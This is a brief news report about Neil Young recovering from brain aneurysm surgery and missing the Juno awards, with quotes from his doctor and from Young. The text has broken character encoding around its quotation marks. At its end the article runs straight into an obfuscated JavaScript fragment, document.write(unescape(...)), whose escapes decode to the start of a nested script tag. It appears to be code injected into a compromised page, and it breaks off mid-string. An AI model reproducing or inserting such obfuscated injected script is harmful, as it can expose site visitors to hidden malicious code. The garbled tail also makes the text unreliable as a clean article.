Neil Young is recovering from a brain aneurysm.
The country music legend underwent surgery on Tuesday (March 29) and is expected to make a full recovery.
According to the BBC, Dr Pierre Gobin said: “Mr Young was treated successfully by the minimally invasive neuroradiology team. He is now resting comfortably.â€
Young had planned to perform at Canada's Juno music awards on Sunday, but has been advised by doctors not to travel.
He said: “I'm really disappointed that I won't be able to make it to Winnipeg for the Junos as I had hoped.
â€I grew up there and was really looking forward to the show as well as spending some time with my old friends and family.
“Thanks to my doctors, I'm feeling a lot better now so I hope I can get a rain check.â€
The aneurysm was reportedly discovered after Young's vision became blurred while participating in the Rock'n'Roll Hall Of Fame ceremony last month.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
